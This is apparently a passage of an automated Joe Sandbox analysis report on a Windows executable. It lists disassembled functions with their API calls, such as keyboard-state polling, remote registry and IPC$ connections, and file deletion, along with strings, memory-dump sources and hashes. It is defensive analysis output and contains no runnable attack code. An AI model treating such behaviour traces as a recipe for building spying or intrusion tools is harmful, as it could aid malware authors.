                                                                                                                      • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                      • API String ID: 2116804098-2391861430
                                                                                                                      • Opcode ID: 7a3dcd57ea97aed97ece44122b598e83f19987c0c4119923d6ccd003419c8e36
                                                                                                                      • Instruction ID: ca8ec2c4ded3c3c52bb046c1b3668d137a77a760c41e8937d5be399f00c24896
                                                                                                                      • Opcode Fuzzy Hash: 7a3dcd57ea97aed97ece44122b598e83f19987c0c4119923d6ccd003419c8e36
                                                                                                                      • Instruction Fuzzy Hash: 5151C372900259BACF16EBA1DD82EEEB778EF05300F204166F505B60A1EB716F58DB61
                                                                                                                      Function 003ED338 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 140COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 003ED37F
                                                                                                                        • Part of subcall function 003ACAEE: _memmove.LIBCMT ref: 003ACB2F
                                                                                                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 003ED3A0
                                                                                                                      • __swprintf.LIBCMT ref: 003ED3F3
                                                                                                                      • _wprintf.LIBCMT ref: 003ED499
                                                                                                                      • _wprintf.LIBCMT ref: 003ED4B7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                      • API String ID: 2116804098-3420473620
                                                                                                                      • Opcode ID: 906b685aae6f191601947220c1e39272fd836664d8974a5857a29469331dfe00
                                                                                                                      • Instruction ID: 89f0a8eb228dfc449369addf2be206e951d863a23f18548ea736d3e923d0e749
                                                                                                                      • Opcode Fuzzy Hash: 906b685aae6f191601947220c1e39272fd836664d8974a5857a29469331dfe00
                                                                                                                      • Instruction Fuzzy Hash: 4051D272900259BACB16EBA1DD42EEEB778EF14700F204166F105B60E1EB756F58CF61
                                                                                                                      Function 003DAEE5 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A7E53: _memmove.LIBCMT ref: 003A7EB9
                                                                                                                      • _memset.LIBCMT ref: 003DAF74
                                                                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 003DAFA9
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 003DAFC5
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 003DAFE1
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 003DB00B
                                                                                                                      • CLSIDFromString.COMBASE(?,?), ref: 003DB033
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 003DB03E
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 003DB043
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                      • API String ID: 1411258926-22481851
                                                                                                                      • Opcode ID: bbf42ea4c69f542195ecc5c5352d5a61e918c7fc5e1a3386fa86945dbf32761c
                                                                                                                      • Instruction ID: 80640dd5693987a3d403de927286ee055f6603e1ea724a4668248cf84ec91f1c
                                                                                                                      • Opcode Fuzzy Hash: bbf42ea4c69f542195ecc5c5352d5a61e918c7fc5e1a3386fa86945dbf32761c
                                                                                                                      • Instruction Fuzzy Hash: 7E413A76C10228ABCF12EFA4EC85DEEB778FF05700F40416AF901A62A1DB709E05CB90
                                                                                                                      Function 003E7212 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 107windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __swprintf.LIBCMT ref: 003E7226
                                                                                                                      • __swprintf.LIBCMT ref: 003E7233
                                                                                                                        • Part of subcall function 003C234B: __woutput_l.LIBCMT ref: 003C23A4
                                                                                                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 003E725D
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 003E7269
                                                                                                                      • LockResource.KERNEL32(00000000), ref: 003E7276
                                                                                                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 003E7296
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 003E72A8
                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 003E72B7
                                                                                                                      • LockResource.KERNEL32(?), ref: 003E72C3
                                                                                                                      • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 003E7322
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                      • String ID: L6E
                                                                                                                      • API String ID: 1433390588-158042588
                                                                                                                      • Opcode ID: e08353a18c2c2984f3102e2602625821ac382dec8ebd702cfde27aa4e6a63027
                                                                                                                      • Instruction ID: f2ed58d89e5fad568ae37c5fd0eb736dbb11c3df5d68b862ca49917ccb5348ff
                                                                                                                      • Opcode Fuzzy Hash: e08353a18c2c2984f3102e2602625821ac382dec8ebd702cfde27aa4e6a63027
                                                                                                                      • Instruction Fuzzy Hash: F731D275A042A6ABDB129F61DC48AAF7BA8FF08340F048925FD01D2191E774D951DBB4
                                                                                                                      Function 003E83D6 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A7E53: _memmove.LIBCMT ref: 003A7EB9
                                                                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 003E843F
                                                                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 003E8455
                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003E8466
                                                                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 003E8478
                                                                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 003E8489
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: SendString$_memmove
                                                                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                      • API String ID: 2279737902-1007645807
                                                                                                                      • Opcode ID: a2d550b841511087105e4e66b7fb5c135c87767c7b11ab4264cebb9a63c2a336
                                                                                                                      • Instruction ID: 6501a784c8c40091c6df975730c7bdcddfc2ca1ec8054a37fc7e257179299d25
                                                                                                                      • Opcode Fuzzy Hash: a2d550b841511087105e4e66b7fb5c135c87767c7b11ab4264cebb9a63c2a336
                                                                                                                      • Instruction Fuzzy Hash: 0F11CB61E4016D79D715BB62CC46EFF7B7CEB92B41F50091AB811A60C1DEA05A48C9B0
                                                                                                                      Function 0041EC19 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 59windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetClientRect.USER32(?), ref: 0041EC32
                                                                                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 0041EC49
                                                                                                                      • GetWindowDC.USER32(?), ref: 0041EC55
                                                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 0041EC64
                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 0041EC76
                                                                                                                      • GetSysColor.USER32(00000005), ref: 0041EC94
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 272304278-2594219639
                                                                                                                      • Opcode ID: d17fef11ac16057012aa43a93c936f0edc557efe92b4b252710be722e3d9d356
                                                                                                                      • Instruction ID: 1e5ccd93865923f151638d65cf737c4c76776807f04549b1d547d197543bc8a1
                                                                                                                      • Opcode Fuzzy Hash: d17fef11ac16057012aa43a93c936f0edc557efe92b4b252710be722e3d9d356
                                                                                                                      • Instruction Fuzzy Hash: 96215C31A00205BFDB21AF64EC49BEABB75EB08325F904231FA26A51E1DB714992DF15
                                                                                                                      Function 003EC890 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003EC6A0: __time64.LIBCMT ref: 003EC6AA
                                                                                                                        • Part of subcall function 003A41A7: _fseek.LIBCMT ref: 003A41BF
                                                                                                                      • __wsplitpath.LIBCMT ref: 003EC96F
                                                                                                                        • Part of subcall function 003C297D: __wsplitpath_helper.LIBCMT ref: 003C29BD
                                                                                                                      • _wcscpy.LIBCMT ref: 003EC982
                                                                                                                      • _wcscat.LIBCMT ref: 003EC995
                                                                                                                      • __wsplitpath.LIBCMT ref: 003EC9BA
                                                                                                                      • _wcscat.LIBCMT ref: 003EC9D0
                                                                                                                      • _wcscat.LIBCMT ref: 003EC9E3
                                                                                                                        • Part of subcall function 003EC6E4: _memmove.LIBCMT ref: 003EC71D
                                                                                                                        • Part of subcall function 003EC6E4: _memmove.LIBCMT ref: 003EC72C
                                                                                                                      • _wcscmp.LIBCMT ref: 003EC92A
                                                                                                                        • Part of subcall function 003ECE59: _wcscmp.LIBCMT ref: 003ECF49
                                                                                                                        • Part of subcall function 003ECE59: _wcscmp.LIBCMT ref: 003ECF5C
                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003ECB8D
                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003ECC24
                                                                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003ECC3A
                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003ECC4B
                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003ECC5D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 152968663-0
                                                                                                                      • Opcode ID: 8d26bff255eab52c226894755751bba2b840fab0dd2900f243b012dfb0a0dedc
                                                                                                                      • Instruction ID: 33df7a748d7ac7e02944ec83b7d8eb32663b06ef827f6b68dc5493ae8dbb5c1e
                                                                                                                      • Opcode Fuzzy Hash: 8d26bff255eab52c226894755751bba2b840fab0dd2900f243b012dfb0a0dedc
                                                                                                                      • Instruction Fuzzy Hash: A5C12BB1D00229AECF12DFA5CC81EEEB7BDEF49310F1041AAF609E6151D7709A858F65
                                                                                                                      Function 003F08D9 Relevance: 18.2, APIs: 12, Instructions: 196COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3566271842-0
                                                                                                                      • Opcode ID: e0c1faf2fc608300b39d37d428667b4c7bdd43991c36b35263579e05f3b31c4f
                                                                                                                      • Instruction ID: f1b49ff39a2181d6703e80757b64bbfbd28fa4726ccab1f8e2a44cedc6204577
                                                                                                                      • Opcode Fuzzy Hash: e0c1faf2fc608300b39d37d428667b4c7bdd43991c36b35263579e05f3b31c4f
                                                                                                                      • Instruction Fuzzy Hash: EF712F75A00219AFDB15EFA4C885ADEB7B8FF49310F048495E919EB262D730EE41CF94
                                                                                                                      Function 003E388D Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?), ref: 003E3908
                                                                                                                      • SetKeyboardState.USER32(?), ref: 003E3973
                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 003E3993
                                                                                                                      • GetKeyState.USER32(000000A0), ref: 003E39AA
                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 003E39D9
                                                                                                                      • GetKeyState.USER32(000000A1), ref: 003E39EA
                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 003E3A16
                                                                                                                      • GetKeyState.USER32(00000011), ref: 003E3A24
                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 003E3A4D
                                                                                                                      • GetKeyState.USER32(00000012), ref: 003E3A5B
                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 003E3A84
                                                                                                                      • GetKeyState.USER32(0000005B), ref: 003E3A92
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 541375521-0
                                                                                                                      • Opcode ID: 90c42f468541628018c4c17e9df56a1c95ce40bdccadcdec266d1cadb12953d8
                                                                                                                      • Instruction ID: 05dc2fdac48ab9a1955d01009dcf65631675a0a8d5760734b0b2d7df263df63f
                                                                                                                      • Opcode Fuzzy Hash: 90c42f468541628018c4c17e9df56a1c95ce40bdccadcdec266d1cadb12953d8
                                                                                                                      • Instruction Fuzzy Hash: 1A51E830A047E429FB36EBA688157EAAFB45F01340F49479DD5C25B1C2DB649B8CC762
                                                                                                                      Function 003DFAFD Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 003DFB19
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 003DFB2B
                                                                                                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 003DFB89
                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 003DFB94
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 003DFBA6
                                                                                                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 003DFBFC
                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 003DFC0A
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 003DFC1B
                                                                                                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 003DFC5E
                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 003DFC6C
                                                                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 003DFC89
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 003DFC96
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3096461208-0
                                                                                                                      • Opcode ID: 83d244b748ed4ee5d36a1c82a66a9a40c5436fdcb5d8e59f350aa2788b983f47
                                                                                                                      • Instruction ID: 0e30055f940d7eb19bbd215ceae1bed565b79f575b8d637d7a7b695447f2e790
                                                                                                                      • Opcode Fuzzy Hash: 83d244b748ed4ee5d36a1c82a66a9a40c5436fdcb5d8e59f350aa2788b983f47
                                                                                                                      • Instruction Fuzzy Hash: 4F512071B00209AFDB18CF68DD95BAEBBBAEB88310F558139F916D7290D7B09D41CB10
                                                                                                                      Function 003BB039 Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BB155: GetWindowLongW.USER32(?,000000EB), ref: 003BB166
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 003BB067
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ColorLongWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 259745315-0
                                                                                                                      • Opcode ID: 750b28c67a1afc7fb92f3f4e6e12fd51a61dd14bf793c15edd677c83154bf16e
                                                                                                                      • Instruction ID: 6a3a6505ec795e8435d376eec868d088cf4a773aaa40c406e9c5a76cbc99a2fa
                                                                                                                      • Opcode Fuzzy Hash: 750b28c67a1afc7fb92f3f4e6e12fd51a61dd14bf793c15edd677c83154bf16e
                                                                                                                      • Instruction Fuzzy Hash: 8741D531500500AFDB326F28DC89BFA7765AB05739F584261FE758B5E2DBB08C42CB25
                                                                                                                      Function 003E7334 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 136442275-0
                                                                                                                      • Opcode ID: e8ee122a91f8c6e6bed8987948b2f2d04864d350257293c58183b40f9fc40cd0
                                                                                                                      • Instruction ID: 6283f682afee124503bd10b9fd30c6e15388cdd4cf2d9b2433e9c243d820ac28
